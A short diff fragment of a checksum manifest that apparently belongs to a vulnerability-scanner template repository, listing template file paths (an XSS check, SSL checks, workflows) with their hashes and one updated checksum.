http/vulnerabilities/royalevent/royalevent-stored-xss.yaml:0dff308c17c106878b9b4e1474cbc88e8e5bafc6 @@ -9389,7 +9414,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5ac6ae3597d9512e4e3d80ade56dea5cb8d681ad +templates-checksum.txt:0350657046ba5f58c93d4aaa60be859d0adeecd0 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4